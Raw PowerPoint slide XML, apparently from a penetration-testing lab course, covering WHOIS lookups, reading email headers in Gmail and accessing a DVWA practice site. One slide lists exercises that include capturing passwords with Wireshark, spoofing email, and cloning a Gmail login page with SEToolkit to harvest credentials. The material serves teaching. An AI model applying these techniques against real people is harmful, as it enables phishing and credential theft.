            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>WHOIS LOOKUP</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120" name="Google Shape;1120;p164"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77644" y="1621669"/>
            <a:ext cx="5563200" cy="1035000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="138888"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Although Website Informer tell us about Who is information also but we can also access who is directly on</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="138888"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Whois.domaintools.com</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="138888"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Whois.net</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="138888"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Whosi.info </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="178571"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1121" name="Google Shape;1121;p164"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2200819" y="1897538"/>
            <a:ext cx="6875514" cy="2930551"/>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65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509494" y="0"/>
            <a:ext cx="8108100" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>WHOIS LOOKUP</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1127" name="Google Shape;1127;p165"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3438169" y="66722"/>
            <a:ext cx="5655674" cy="5010057"/>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66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509494" y="0"/>
            <a:ext cx="8108100" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Complete information about any website</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;p166"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186825" y="1131938"/>
            <a:ext cx="8595900" cy="1035000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Open Browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>https://website.informer.com</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1134" name="Google Shape;1134;p166"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1904550"/>
            <a:ext cx="8971744" cy="31246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67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="96975" y="327863"/>
            <a:ext cx="85326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Information Gathering of Website From Email</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1141" name="Google Shape;1141;p167"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="2263500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-254000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open Gmail</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-254000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Go to Reply </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-254000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Show Originals</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1142" name="Google Shape;1142;p167"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2918091" y="1297613"/>
            <a:ext cx="6122194" cy="37147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168"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="96975" y="327863"/>
            <a:ext cx="85326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Information Gathering of Website From Email</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1149" name="Google Shape;1149;p168"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="2263500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-254000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open Gmail</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-254000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Go to Reply </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-254000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Show Originals</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1150" name="Google Shape;1150;p168"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="855731" y="2385197"/>
            <a:ext cx="7015163" cy="2278856"/>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69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="96975" y="327863"/>
            <a:ext cx="85326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Information Gathering of Website From Email</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1157" name="Google Shape;1157;p169"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="562875" y="1221345"/>
            <a:ext cx="8115300" cy="3018000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-254000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open Gmail</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-254000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Go to Reply </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-254000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Show Originals</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1158" name="Google Shape;1158;p169"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512181" y="1221338"/>
            <a:ext cx="6372225" cy="3667406"/>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70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="8614800" cy="403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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5. Capture HTTP Packet and identify User Id and Password using Wireshark </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6. Perform vulnerability scanning using Nessus tool</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7. Creating and analyzing spoofed emails using emkei.cz, online tool</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8. Intercept Web Traffic using Burp proxy</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9. Demonstrate Web Traffic Poisoning using Burp Suite</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10. Use Website Template of Gmail to capture userid and Password using SEToolkit</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11. Perform Host DIscovery, Service Discovery, Port Scanning using Using Metasploit</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12. Enumerates MySQL Info and Enumerates Directories Used by Web Servers by using NMAP</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13. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</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14. Use Kali Linux on DVWA Cloud </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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5"/>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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Google Shape;283;p45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="8260800" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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root@kali:~# maltego scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="284" name="Google Shape;284;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1100675"/>
            <a:ext cx="9144000" cy="38936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171"/>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FINDING DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1169" name="Google Shape;1169;p171"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="777563" y="1170125"/>
            <a:ext cx="7588876" cy="38209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7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OPENING DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1175" name="Google Shape;1175;p172"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047175" y="1017725"/>
            <a:ext cx="7049640" cy="38209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17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LOGIN TO DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p173"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2142075" y="1064275"/>
            <a:ext cx="5089142" cy="3820974"/>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174"/>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GETTING IP ADDRESS OF DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1187" name="Google Shape;1187;p174"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1170125"/>
            <a:ext cx="8839202" cy="3714922"/>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75"/>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IP ADDRESS OF DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p175"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="885425" y="1017725"/>
            <a:ext cx="7946880" cy="3820974"/>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7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DVWA Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1199" name="Google Shape;1199;p176"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
